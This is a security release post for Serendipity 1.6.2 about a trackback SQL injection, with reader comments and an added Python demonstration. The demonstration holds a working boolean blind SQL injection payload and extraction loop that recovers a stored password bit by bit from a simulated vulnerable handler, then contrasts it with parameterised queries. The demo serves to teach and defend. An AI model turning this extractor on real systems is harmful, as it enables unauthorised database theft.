Serendipity 1.6.2 released

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/functions_trackbacks.inc.php: diff on github.

The error is that input in include/functions_trackbacks.inc.php is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL into a query. We initially rated the impact as low because our DB layer does not execute multiple statements and the affected query is not used to produce any output. Thanks to Pawel Golen it was made clear to us that the issue can nonetheless be used to read the database remotely through blind SQL injection: the attacker learns only a single bit (0/1) per request, so extracting content is slow and generates a lot of traffic, but it works. Thus you should definitely upgrade your installation.
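As an added example (not Serendipity's code and not the 1.6.2 fix), the following Python script models the situation described above against an in-memory SQLite database: a trackback handler that runs an unescaped query whose rows are never shown, but whose accept/reject decision still leaks one bit per request. The schema, the TrackbackHandler class, the accept/reject oracle and the sample password are assumptions made for illustration. The same payload is then run against a parameterised query (the proper fix) and against addslashes-style escaping of the kind magic_quotes_gpc applied, which is why the advisory conditions the bug on that setting being off.

```python
import sqlite3


def make_db():
    """Constructed sample data; the schema is an assumption, not Serendipity's."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT)")
    con.execute("CREATE TABLE authors (username TEXT, password TEXT)")
    con.execute("INSERT INTO entries VALUES (1, 'First post')")
    con.execute("INSERT INTO authors VALUES ('admin', 's3cret!')")
    return con


class TrackbackHandler:
    """Hypothetical handler: it looks the target entry up and accepts or
    rejects the trackback. The query's rows are never echoed back; the only
    observable result is that accept/reject decision."""

    def __init__(self, con, vulnerable=True):
        self.con = con
        self.vulnerable = vulnerable
        self.requests = 0  # how many requests the attacker has made

    def accept(self, entry_id):
        self.requests += 1
        try:
            if self.vulnerable:
                # Untrusted input concatenated into the statement: the bug class.
                sql = "SELECT id FROM entries WHERE id = '" + entry_id + "'"
                row = self.con.execute(sql).fetchone()
            else:
                # Fix: a bound parameter can never become SQL syntax.
                sql = "SELECT id FROM entries WHERE id = ?"
                row = self.con.execute(sql, (entry_id,)).fetchone()
        except sqlite3.Error:
            return False  # a failing query simply rejects the trackback
        return row is not None


def magic_quotes(s):
    """addslashes()-style escaping as PHP's magic_quotes_gpc applied it."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction: recover the string that `subquery`
    returns, one bit per request, using only the oracle's True/False."""
    out = ""
    for pos in range(1, max_len + 1):
        byte = 0
        for bit in range(7, -1, -1):
            # Closes the open quote, tests one bit of one character, and
            # re-opens a quote so the original trailing ' still parses.
            payload = (f"1' AND (ifnull(unicode(substr(({subquery}),{pos},1)),0)"
                       f" & {1 << bit}) <> 0 AND '1'='1")
            if oracle(payload):
                byte |= 1 << bit
        if byte == 0:  # substr() past the end of the string yields ''
            break
        out += chr(byte)
    return out


SECRET_QUERY = "SELECT password FROM authors LIMIT 1"


def demo():
    con = make_db()
    vuln = TrackbackHandler(con, vulnerable=True)
    secret = blind_extract(vuln.accept, SECRET_QUERY)

    fixed = TrackbackHandler(con, vulnerable=False)
    still_works = fixed.accept("1")  # a legitimate lookup keeps working
    after_fix = blind_extract(fixed.accept, SECRET_QUERY)

    # Escaping the quotes also defeats this particular payload, but it is
    # not a fix: it depends on the backend's quoting rules (SQLite does not
    # even treat backslash as an escape, so the query just fails to parse),
    # while parameter binding does not.
    quoted = TrackbackHandler(con, vulnerable=True)
    with_magic_quotes = blind_extract(lambda p: quoted.accept(magic_quotes(p)),
                                      SECRET_QUERY)
    return secret, vuln.requests, still_works, after_fix, with_magic_quotes


if __name__ == "__main__":
    secret, n, ok, after_fix, mq = demo()
    print(f"extracted {secret!r} in {n} requests; legitimate id accepted after fix: {ok}; "
          f"leaked after fix: {after_fix!r}; leaked with magic_quotes: {mq!r}")
```

Eight requests per character (plus eight to detect the end of the string) is what makes the attack noisy: a seven-character value costs 64 requests, and a real table takes thousands, which is also what a request log or rate limit would show.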

Serendipity is an open-source based product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others of the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.


Comments

Pawel Golen:

I can't agree with this risk rating. Blind sql injection can be used in this case to extract database content. I've checked it and it works like a charm.

Garvin:

Hi Pawel! Can you explain how you achieve that? The query is only executed, and no returned data is passed along to output, so I don't exactly see how this can be used. I am not a SQL security expert, so if you can explain the situation, of course I would raise the risk assessment in that case!

Thanks for your input, Garvin

Pawel Golen:

I've sent you an email at blog@... with details. I hope you got it.

Garvin:

Thanks a lot for your specific email, now I see a lot clearer and have changed this blog text accordingly.

ahappycustomer:

Now I am happy that I run a 4-year-old version of s9y that is not affected by this bug. Thank you so much for s9y, I'm a very happy "customer" :)

And yes, I know that 1.3 has had security issues since then, but those are all limited to weird extensions or being an admin, if I'm not missing anything. So thanks again, this proves so much how s9y is superior to WordPress when it comes to security.
